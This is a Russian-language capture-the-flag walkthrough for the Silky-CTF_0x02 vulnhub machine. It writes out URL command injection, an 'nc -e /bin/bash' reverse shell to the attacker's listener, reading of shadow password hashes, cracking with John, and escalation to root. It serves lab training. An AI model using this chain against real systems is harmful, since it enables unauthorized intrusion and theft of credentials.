Решение CTF. Silky-CTF_0x02.
Здравствуйте, дорогие друзья.
Продолжаем рассматривать решение заданий CTF, и сейчас рассмотрим вторую часть Silky-CTF, и она так и называется Silky-CTF_0x02.
Скачать ее можно с vulnhub, где мы сможем найти ссылку:
https://www.vulnhub.com/entry/silky-ctf-0x02,307/.
Для начала скачаем данную виртуальную машину и сверим контрольную сумму. Что это такое, и как сравнивать, я описывал в предыдущем решении, так что потрудитесь и найдите необходимые шаги, которые мы проходили:
![vulnhub download](https://timcore.ru/wp-content/uploads/2021/11/screenshot_1-1024x654.png)
После сверки контрольной суммы, нужно просто сделать двойной щелчок мыши и установка начнется автоматически. В данном примере я использую среду виртуализации Vmware.
Окно для ввода пароля будет выглядеть как:
![Окно для ввода пароля будет выглядеть как](https://timcore.ru/wp-content/uploads/2021/11/screenshot_2.png)
Разумеется, пароль и айпи адрес мы не знаем.
Нам нужно узнать айпи в нашей сети, с помощью утилиты «netdiscover»:
![Нам нужно узнать айпи в нашей сети, с помощью утилиты «netdiscover»](https://timcore.ru/wp-content/uploads/2021/11/screenshot_3.png)
Отлично, теперь мы знаем наш искомый айпи-адрес. Давайте просканируем цель на предмет открытых портов. Воспользуемся инструментом «nmap», и команда будет выглядеть как: «nmap –A –sV 192.168.119.139 »:
![nmap –A –sV 192.168.119.139](https://timcore.ru/wp-content/uploads/2021/11/screenshot_4.png)
Как видим, открыты два порта – это 22/tcp ssh, и 80/tcp http. Переходим в браузер, и видим, что сервер запущен на исследуемой машине:
![запущенный сервер apache2](https://timcore.ru/wp-content/uploads/2021/11/screenshot_5-1024x539.png)
Далее воспользуемся сканером веб-контента dirb, и поищем директории:
![Далее воспользуемся сканером веб-контента dirb, и поищем директории](https://timcore.ru/wp-content/uploads/2021/11/screenshot_6.png)
Нас будет интересовать админка:
![Нас будет интересовать админка](https://timcore.ru/wp-content/uploads/2021/11/screenshot_7-1024x538.png)
Введем рандомные логин и пароль. Получаем следующий вывод:
![рандомный логин и пароль](https://timcore.ru/wp-content/uploads/2021/11/bezymjannyj.png)
Поиграемся с адресной строкой url, в частности заменим имя пользователя, на команду линукс «ls»:
![линукс ls](https://timcore.ru/wp-content/uploads/2021/11/screenshot_9-1024x403.png)
Можем пойти дальше и дополнить команду с параметрами «-al»:
![Можем пойти дальше и дополнить команду с параметрами «-al»](https://timcore.ru/wp-content/uploads/2021/11/screenshot_10-1024x485.png)
Отлично, видим вывод достаточно полезной информации.
Далее нам нужно воспользоваться инструментом «netcat», для прослушивания входящего соединения. Это команда
«nc –lvp 4545». Все это делаем в директории «Desktop»:
![nc –lvp 4545](https://timcore.ru/wp-content/uploads/2021/11/screenshot_11.png)
Проверяем свой айпи адрес, с помощью команды «ifconfig»:
![ifconfig](https://timcore.ru/wp-content/uploads/2021/11/screenshot_12.png)
Адрес нам нужен для последующего соединения с нашей машиной.
Переходим в админку сайта, и прописываем команду в адресной строке url: «/bin/nc 192.168.119.128 4545 –e /bin/bash»:
![/bin/nc 192.168.119.128 4545 –e /bin/bash»](https://timcore.ru/wp-content/uploads/2021/11/screenshot_13-1024x472.png)
Соединение было успешно установлено:
![Соединение было успешно установлено](https://timcore.ru/wp-content/uploads/2021/11/screenshot_14.png)
Теперь нам нужно воспользоваться скриптом на Python, для перехода в шелл. Это команда: «python –c ‘import pty;pty.spawn(“/bin/bash”)’»:
![python –c ‘import pty;pty.spawn(“/bin/bash”)’](https://timcore.ru/wp-content/uploads/2021/11/screenshot_15.png)
Походив по директориям, можно найти флаг:
![Походив по директориям, можно найти флаг](https://timcore.ru/wp-content/uploads/2021/11/screenshot_16.png)
После этого продолжаем рассматривать различные директории, с помощью команды «ls -alh», и нас будет интересовать файл «cat_shadow»:
![После этого продолжаем рассматривать различные директории, с помощью команды «ls -alh»](https://timcore.ru/wp-content/uploads/2021/11/screenshot_18.png)
Пробуем запустить этот файл, но сразу это сделать не получается:
![Пробуем запустить этот файл, но сразу это сделать не получается](https://timcore.ru/wp-content/uploads/2021/11/screenshot_19.png)
Наконец-то у нас получилось открыть данный файл, и мы видим список зашифрованных паролей, в частности «root»:
![мы видим список зашифрованных паролей, в частности «root»](https://timcore.ru/wp-content/uploads/2021/11/screenshot_20.png)
Копируем полученное значение пароля, и переходим в новый терминал, создав файл в текстовом редакторе nano:
![Копируем полученное значение пароля, и переходим в новый терминал, создав файл в текстовом редакторе nano](https://timcore.ru/wp-content/uploads/2021/11/screenshot_21.png)
Теперь можно взломать пароль с помощью инструмента John:
![Теперь можно взломать пароль с помощью инструмента John](https://timcore.ru/wp-content/uploads/2021/11/screenshot_22.png)
После некоторого промежутка времени наш хэш будет взломан:
![После некоторого промежутка времени наш хэш будет взломан](https://timcore.ru/wp-content/uploads/2021/11/screenshot_23.png)
Пробуем повысить права с помощью взломанного пароля:
![Пробуем повысить права с помощью взломанного пароля](https://timcore.ru/wp-content/uploads/2021/11/screenshot_24.png)
Переходим в директорию «root», и находим наш флаг:
![Переходим в директорию «root», и находим наш флаг](https://timcore.ru/wp-content/uploads/2021/11/screenshot_25.png)
![На этом все. Всем хорошего дня.](https://timcore.ru/wp-content/uploads/2021/11/screenshot_26.png)
На этом все. Всем хорошего дня.